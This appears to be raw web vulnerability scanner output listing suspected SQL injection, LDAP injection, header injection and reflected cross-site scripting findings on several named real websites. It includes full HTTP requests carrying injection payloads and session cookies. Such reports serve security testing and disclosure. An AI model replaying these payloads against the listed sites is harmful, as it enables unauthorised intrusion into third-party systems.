The TLTSID cookie appears to be vulnerable to SQL injection attacks. The payloads 20087571'%20or%201%3d1--%20 and 20087571'%20or%201%3d2--%20 were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The CMSSESSIDe4d04fcf cookie appears to be vulnerable to SQL injection attacks. The payloads 34446388'%20or%201%3d1--%20 and 34446388'%20or%201%3d2--%20 were each submitted in the CMSSESSIDe4d04fcf cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ecommerce/cart.php?suggest=0 HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj6334446388'%20or%201%3d1--%20
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <a href="http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/">Click here to keep shopping in PCI ASV Scanning Services</a> </div>
<div style="display: none"> <p class="InfoMessage"> <strong>There are no products in your cart.</strong> </p> To add a product to your cart, first browse for it or use the search box and then click its "Add to Cart" button. <br /><br /> <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page. </div> </div> </div> <div class="Block Moveable Panel" id="SuggestiveCartContent" style=""> <div class="BlockContent"> <h2>You May Also Like...</h2> <p>We found some products that you might also be interested in.</p> <ul class="ProductList"> <li class="Odd"> <div class="ProductImage"> <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a> </div> <div class="ProductDetails"> <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong> </div> <div class="ProductPriceRating"> <em><strike>$129.95</strike> $94.95</em> <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span> </div> <div class="ProductCompareButton" style="display:none"> <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br /> </div> <div class="ProductActionAdd" style="display:;"> <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&product_id=2">Add To Cart</a> </div> </li> ...[SNIP]...
Request 2
GET /ecommerce/cart.php?suggest=0 HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj6334446388'%20or%201%3d2--%20
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <a href="http://www.clone-systems.com/ecommerce">Click here to keep shopping</a> </div>
<div style="display: none"> <p class="InfoMessage"> <strong>There are no products in your cart.</strong> </p> To add a product to your cart, first browse for it or use the search box and then click its "Add to Cart" button. <br /><br /> <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page. </div> </div> </div> <div class="Block Moveable Panel" id="SuggestiveCartContent" style=""> <div class="BlockContent"> <h2>You May Also Like...</h2> <p>We found some products that you might also be interested in.</p> <ul class="ProductList"> <li class="Odd"> <div class="ProductImage"> <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a> </div> <div class="ProductDetails"> <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong> </div> <div class="ProductPriceRating"> <em><strike>$129.95</strike> $94.95</em> <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span> </div> <div class="ProductCompareButton" style="display:none"> <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br /> </div> <div class="ProductActionAdd" style="display:;"> <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&product_id=2">Add To Cart</a> </div> </li> <li class="Even"> <div class="ProductImage"> <a ...[SNIP]...
1.33. http://www.clone-systems.com/ecommerce/cart.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.clone-systems.com
Path:
/ecommerce/cart.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ecommerce/cart.php?suggest=0&1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <a href="http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/">Click here to keep shopping in PCI ASV Scanning Services</a> </div>
<div style="display: none"> <p class="InfoMessage"> <strong>There are no products in your cart.</strong> </p> To add a product to your cart, first browse for it or use the search box and then click its "Add to Cart" button. <br /><br /> <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page. </div> </div> </div> <div class="Block Moveable Panel" id="SuggestiveCartContent" style=""> <div class="BlockContent"> <h2>You May Also Like...</h2> <p>We found some products that you might also be interested in.</p> <ul class="ProductList"> <li class="Odd"> <div class="ProductImage"> <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a> </div> <div class="ProductDetails"> <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong> </div> <div class="ProductPriceRating"> <em><strike>$129.95</strike> $94.95</em> <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span> </div> <div class="ProductCompareButton" style="display:none"> <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br /> </div> <div class="ProductActionAdd" style="display:;"> <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&product_id=2">Add To Cart</a> </div> </li> ...[SNIP]...
Request 2
GET /ecommerce/cart.php?suggest=0&1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <a href="http://www.clone-systems.com/ecommerce">Click here to keep shopping</a> </div>
<div style="display: none"> <p class="InfoMessage"> <strong>There are no products in your cart.</strong> </p> To add a product to your cart, first browse for it or use the search box and then click its "Add to Cart" button. <br /><br /> <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page. </div> </div> </div> <div class="Block Moveable Panel" id="SuggestiveCartContent" style=""> <div class="BlockContent"> <h2>You May Also Like...</h2> <p>We found some products that you might also be interested in.</p> <ul class="ProductList"> <li class="Odd"> <div class="ProductImage"> <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a> </div> <div class="ProductDetails"> <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong> </div> <div class="ProductPriceRating"> <em><strike>$129.95</strike> $94.95</em> <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span> </div> <div class="ProductCompareButton" style="display:none"> <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br /> </div> <div class="ProductActionAdd" style="display:;"> <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&product_id=2">Add To Cart</a> </div> </li> <li class="Even"> <div class="ProductImage"> <a ...[SNIP]...
2. LDAP injectionpreviousnext There are 9 instances of this issue:
The client parameter appears to be vulnerable to LDAP injection attacks.
The payloads 4c58e894af09d5bd)(sn=* and 4c58e894af09d5bd)!(sn=* were each submitted in the client parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)(sn=*&adurl=;ord=2114915439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The num parameter appears to be vulnerable to LDAP injection attacks.
The payloads 3beb1e7094e1a2ad)(sn=* and 3beb1e7094e1a2ad)!(sn=* were each submitted in the num parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The TCID cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the TCID cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /efs/servlet/military/login-wait.jsp HTTP/1.1 Host: militarybankonline.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=*)(sn=*; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;
</table> <div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div> <!-- end nav 3 -->
<!-- BEGIN CONTENT AREA --> <div id="content" >
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<span class="mainfontbold">Please Wait...</span>
<script language="JavaScript" type="text/javascript"> function setLocation() { location.replace("/efs/servlet/military/DetectDemoMode"); } window.onload=setLocation </script>
</table> <div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div> <!-- end nav 3 -->
<!-- BEGIN CONTENT AREA --> <div id="content" >
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<span class="mainfontbold">Please Wait...</span>
<script language="JavaScript" type="text/javascript"> function setLocation() { location.replace("/efs/servlet/military/DetectDemoMode"); } window.onload=setLocation </script>
The ngen_throttle cookie appears to be vulnerable to LDAP injection attacks.
The payloads 1619b63cb2b56805)(sn=* and 1619b63cb2b56805)!(sn=* were each submitted in the ngen_throttle cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /efs/servlet/military/login-wait.jsp HTTP/1.1 Host: militarybankonline.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=1619b63cb2b56805)(sn=*; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;
</table> <div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div> <!-- end nav 3 -->
<!-- BEGIN CONTENT AREA --> <div id="content" >
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<span class="mainfontbold">Please Wait...</span>
<script language="JavaScript" type="text/javascript"> function setLocation() { location.replace("/efs/servlet/military/DetectDemoMode"); } window.onload=setLocation </script>
</table> <div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div> <!-- end nav 3 -->
<!-- BEGIN CONTENT AREA --> <div id="content" >
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp // This file is part of business e-finance suite (befs). // It contains business specific info, and is different from the same named cefs file. -->
<span class="mainfontbold">Please Wait...</span>
<script language="JavaScript" type="text/javascript"> function setLocation() { location.replace("/efs/servlet/military/DetectDemoMode"); } window.onload=setLocation </script>
The cck parameter appears to be vulnerable to LDAP injection attacks.
The payloads 5af86ec746dc2d56)(sn=* and 5af86ec746dc2d56)!(sn=* were each submitted in the cck parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The ci parameter appears to be vulnerable to LDAP injection attacks.
The payloads bcc72cbfd1bac411)(sn=* and bcc72cbfd1bac411)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The ci parameter appears to be vulnerable to LDAP injection attacks.
The payloads 7fd121d0852e72ac)(sn=* and 7fd121d0852e72ac)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The BIGipServerngen-www.80 cookie appears to be vulnerable to LDAP injection attacks.
The payloads 4f1f2a3187adb27d)(sn=* and 4f1f2a3187adb27d)!(sn=* were each submitted in the BIGipServerngen-www.80 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The BIGipServerngen-www.80 cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the BIGipServerngen-www.80 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 69ddc%0d%0a94739ce3cc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3A%2F%2Fservedby.flashtalking.com%2Fclick%2F16008%3B128708%3B94221%3B230%3B3%2F%3Furl%3Dhttp:%2F%2Fresponse.firstdata.com%2F%3FelqPURLPage%3D15&69ddc%0d%0a94739ce3cc=1 HTTP/1.1 Host: 109.xg4ken.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 23:44:08 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=53c1fc86-0f12-0ce9-ea0e-00005cbf77a5; expires=Sun, 24-Jul-2011 23:44:08 GMT; path=/; domain=.xg4ken.com Location: http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15&69ddc 94739ce3cc=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
4. Cross-site scripting (reflected)previousnext There are 70 instances of this issue:
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574ea"><script>alert(1)</script>46987829a31 was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.2. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.snap.com
Path:
/signup.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ae7"%3balert(1)//631b5ca9cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4ae7";alert(1)//631b5ca9cf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.3. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.snap.com
Path:
/signup.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b702f"><script>alert(1)</script>9caf33b1143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.4. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.snap.com
Path:
/signup.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e6c"><script>alert(1)</script>b24b8c87a04849e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
4.5. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://account.snap.com
Path:
/signup.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81bfc"%3balert(1)//0b224300d3fd4d46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81bfc";alert(1)//0b224300d3fd4d46a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ae50"><script>alert(1)</script>0b72ea1f0e8 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload c52ae<script>alert(1)</script>e41adc6af97 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289667c52ae<script>alert(1)</script>e41adc6af97 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
Response
